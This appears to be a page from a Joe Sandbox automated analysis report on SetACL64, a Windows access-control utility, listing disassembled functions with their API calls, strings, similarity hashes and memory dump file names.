SetLogFile, xrefs: 00007FF69704FE21, 00007FF69704FFFC, 00007FF6970501DC

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
String ID: on $====================================================================$FileVersion$SetLogFile$Starting SetACL.exe
API String ID: 363805048-2110037876
Opcode ID: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
Instruction ID: 6a02166349ce22af5acf925ba5bd26bf9c6b818863c8794a311de0bda686acc0
Opcode Fuzzy Hash: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
Instruction Fuzzy Hash: DC2293A2B19B8181EF109B79E5493AD6372EB917E4F505275EA5CC3AE9DF7CE180C300

Function 00007FF69706B8E0 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 409COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 00007FF69706B8E5
GetLastError.KERNEL32 ref: 00007FF69706B8F3

Part of subcall function 00007FF69704BF60: GetLastError.KERNEL32 ref: 00007FF69704BFCE

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF0F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF15
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706BF5D

Strings

Created the directory ', xrefs: 00007FF69706BD39
The directory ', xrefs: 00007FF69706B962
CreateDirectoryAPIWrapper, xrefs: 00007FF69706B9D4, 00007FF69706BC00, 00007FF69706BD9A
' could not be created because: , xrefs: 00007FF69706B979
Directory already exists: ', xrefs: 00007FF69706BB9F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$CreateDirectory
String ID: ' could not be created because: $CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
API String ID: 3201042626-1824261680
Opcode ID: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
Instruction ID: e0c137e4649180f89ac51989c8870fa31cbc8e67eba6a2e1e84fc0e5de96f687
Opcode Fuzzy Hash: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
Instruction Fuzzy Hash: 8F027CE2B19B4285EA20CB78D4553AC3362EB447E8F505771DA6CD36E9EE7CE285C304

Function 00007FF697053755 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF697053760
GetLastError.KERNEL32 ref: 00007FF69705376E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543DD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054401
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054407
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705440D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054413
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054419
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705441F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705442B

Strings

The version of your operating system could not be determined., xrefs: 00007FF69705379A
SetACL only supports Windows Vista and later., xrefs: 00007FF6970538B7
Prepare, xrefs: 00007FF6970537C8, 00007FF6970538E5

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastVersion
String ID: Prepare$SetACL only supports Windows Vista and later.$The version of your operating system could not be determined.
API String ID: 1165008562-2181592180
Opcode ID: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
Instruction ID: 3d497dc835b6e5d21726b5f5d53fbc8ad38b5481236e53c060a3596652eebbee
Opcode Fuzzy Hash: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
Instruction Fuzzy Hash: 6C71A4B2A1978381EA209B69E4853AEA321FB847E8F401575E75DC3AE9DF7CE144C704

Function 00007FF697052008 Relevance: 28.6, APIs: 19, Instructions: 119COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705212B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052131
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052137
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705213D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052143
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052149
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705214F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052155
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052161
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052167
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705216D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052173
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705217F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052185
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705218B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052191
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052197
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705219D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970521A3

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 46baa353a109fce6319f0045732bcd5145af92d8f24574fb33639b16f7aed1b8
Instruction ID: f9e1b65a9e9293eba58d0792bdc55321b91df89340e3f85f20ec4a3dc003eca1
Opcode Fuzzy Hash: 46baa353a109fce6319f0045732bcd5145af92d8f24574fb33639b16f7aed1b8
Instruction Fuzzy Hash: 1F413FE1B5B75340FA64A769A89A3BD1222EF457E4F401DB1D71CC66E7DE2CA180C208

Function 00007FF6970513D1 Relevance: 28.6, APIs: 19, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
Instruction ID: 5edca8976423c747697478178b58b4343aa301f57aaebfc2bfe302b1e27e6efa
Opcode Fuzzy Hash: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
Instruction Fuzzy Hash: C53110E1A5B75344FA60B76998EA3BE1222EF457E4F402DB1DB1CC65D7DE2CA180C208

Function 00007FF69706ECA0 Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 446shareCOMMON

Download Yara Rule

APIs

WNetOpenEnumW.MPR ref: 00007FF69706ED54
WNetEnumResourceW.MPR ref: 00007FF69706EDE9
WNetCloseEnum.MPR ref: 00007FF69706F004
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F381
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F387
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F38D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F39F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F3A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F3AB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F3B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F3B7

Strings

GetUNCPathOfMappedDrive, xrefs: 00007FF69706F124
Retrieving the remote path for mapped drive L<, xrefs: 00007FF69706F081
> failed with: , xrefs: 00007FF69706F0C8

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Enum$CloseOpenResource
String ID: > failed with: $GetUNCPathOfMappedDrive$Retrieving the remote path for mapped drive L<
API String ID: 3788045339-1117730555
Opcode ID: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
Instruction ID: e8b45c555524122a083af02bbcf1948913f0636f7c8848ba5e3d0fa8da5a9672
Opcode Fuzzy Hash: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
Instruction Fuzzy Hash: DF1271A2B1978181EA209B69E4943AD7362FB847E4F505275EB5DC7BE9DF7CE180C300

Function 00007FF69706A2A0 Relevance: 25.7, APIs: 17, Instructions: 199COMMON

Download Yara Rule

APIs

IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A2F4
GetAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A30D
DeleteAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A338
GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A354
GetLengthSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A361
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A37F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: DeleteErrorInformationLastLengthValid
String ID:
API String ID: 1967920013-0
Opcode ID: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
Instruction ID: cd053bf05a42706f26ee890c6ad03a67c19cdba1db4e4c6a5219beeee2033488
Opcode Fuzzy Hash: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
Instruction Fuzzy Hash: EB817FE2A0C68286EB60AB22A86527A77A1FFD4FD4F044175EE8EC3754EF3CD5448710

Function 00007FF69706AA60 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF69706AAAF

Part of subcall function 00007FF6970721D4: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF697072204
Part of subcall function 00007FF6970721D4: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69707220A

SysAllocString.OLEAUT32 ref: 00007FF69706AAFD
SysAllocString.OLEAUT32 ref: 00007FF69706ABA0
VariantInit.OLEAUT32 ref: 00007FF69706ABCD
SafeArrayGetLBound.OLEAUT32 ref: 00007FF69706AC29
SafeArrayGetUBound.OLEAUT32 ref: 00007FF69706AC45
SafeArrayAccessData.OLEAUT32 ref: 00007FF69706AC6C
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF69706ACAB
VariantClear.OLEAUT32 ref: 00007FF69706ACB8
SysFreeString.OLEAUT32 ref: 00007FF69706ACD4
SysFreeString.OLEAUT32 ref: 00007FF69706AD13
SysFreeString.OLEAUT32 ref: 00007FF69706AD50

Strings

GetSD, xrefs: 00007FF69706AAF6
__systemsecurity=@, xrefs: 00007FF69706A6E8, 00007FF69706AAA8

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: String$ArraySafe$AllocFree$BoundConcurrency::cancel_current_taskDataVariant$AccessClearInitUnaccess
String ID: GetSD$__systemsecurity=@
API String ID: 2119716662-3672729512
Opcode ID: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
Instruction ID: 13ee0f46f617c9f90d7d1827ace39eac92e6216b925213b2d7f5a5f808957aad
Opcode Fuzzy Hash: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
Instruction Fuzzy Hash: 859173B1A09B4286EA34AB21E82137973A4FF94BD0F048575DA4EC3795DF7CE984C740

Function 00007FF697053623 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054401
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054407
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705440D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054413
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054419
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705441F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705442B

Strings

The object type was not specified., xrefs: 00007FF697053641
Prepare, xrefs: 00007FF69705366F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Prepare$The object type was not specified.
API String ID: 3668304517-3861202280
Opcode ID: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
Instruction ID: 6ee293d227addd2d3a9fc929015784e8c308b135fb724047dd8bc2fd4ebae910
Opcode Fuzzy Hash: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
Instruction Fuzzy Hash: A031B8A1A1A78341EA209B69E4963AE6321EF453F4F405971F75CC36EACE7CE141C704

Function 00007FF697069200 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 392COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32 ref: 00007FF69706941D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970697E6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970697F2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970697FE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697069804
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706980A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697069810
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697069816
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706981C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697069822

Part of subcall function 00007FF697070C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697070C35
Part of subcall function 00007FF697070C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF697070C58
Part of subcall function 00007FF697070C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF697070CF3

Strings

> was not found in domain <, xrefs: 00007FF697069498
ProcessACEsOfGivenDomains, xrefs: 00007FF697069567
Account <, xrefs: 00007FF697069481

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_SetgloballocaleValidstd::locale::_
String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
API String ID: 2555488030-3371799133
Opcode ID: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
Instruction ID: 12a8c097993028974de0ef0c4b996ad98e77878da734c8b3db69e35883426d23
Opcode Fuzzy Hash: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
Instruction Fuzzy Hash: 8C0290A2A25B4285EB20CB65D8953AD7361FB947E8F505275EA5C83BE9DF7CE1C0C300

Function 00007FF69704D760 Relevance: 22.7, APIs: 15, Instructions: 223synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF69704D89C
ReleaseMutex.KERNEL32 ref: 00007FF69704D8AE
ResetEvent.KERNEL32 ref: 00007FF69704DA41
WaitForSingleObject.KERNEL32 ref: 00007FF69704DA51

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ObjectSingleWait$EventMutexReleaseReset
String ID:
API String ID: 4195719913-0
Opcode ID: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
Instruction ID: 079ec4eb84ba635a6b477eb1e615c43fb8d35ae0d5e32195634d63f5d356f130
Opcode Fuzzy Hash: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
Instruction Fuzzy Hash: 30B148B2A15BC285EB708F25D8493ED2361FB59BA8F414675DA6CC77E5EF389680C300

Function 00007FF697050520 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 464COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050C92
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050C98
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050C9E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050CA4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050CAA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050CB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050CB6

Part of subcall function 00007FF697043F80: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044104
Part of subcall function 00007FF697043F80: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69704410A

Strings

Invalid access mode for this ACL type specified (e.g. you cannot add audit ACEs to the DACL, only to the SACL)., xrefs: 00007FF697050870
AddACE, xrefs: 00007FF6970505B9, 00007FF697050791, 00007FF69705089D, 00007FF6970509E1
Audit ACEs cannot be set on shares., xrefs: 00007FF6970509B4
No trustee specified., xrefs: 00007FF69705058F
Invalid inheritance specified., xrefs: 00007FF697050764

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: AddACE$Audit ACEs cannot be set on shares.$Invalid access mode for this ACL type specified (e.g. you cannot add audit ACEs to the DACL, only to the SACL).$Invalid inheritance specified.$No trustee specified.
API String ID: 3936042273-1410195417
Opcode ID: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
Instruction ID: 6633abd429172d2b7fdc696e9a39cba9d6b4557221adb9c3cfcdb68af5f0b88e
Opcode Fuzzy Hash: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
Instruction Fuzzy Hash: 8B228CB2A0968285EB20CF79E8843AD7371FB45798F804675DA8CC7A99DF7CE594C300

Function 00007FF6970726DC Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6970726F2
GetModuleHandleW.KERNEL32 ref: 00007FF6970726FF
GetModuleHandleW.KERNEL32 ref: 00007FF697072714
GetProcAddress.KERNEL32 ref: 00007FF69707272C
GetProcAddress.KERNEL32 ref: 00007FF69707273F
CreateEventW.KERNEL32 ref: 00007FF69707276B
DeleteCriticalSection.KERNEL32 ref: 00007FF6970727B7
CloseHandle.KERNEL32 ref: 00007FF6970727C9

Strings

SleepConditionVariableCS, xrefs: 00007FF697072722
kernel32.dll, xrefs: 00007FF69707270D
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF6970726F8
WakeAllConditionVariable, xrefs: 00007FF697072732

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

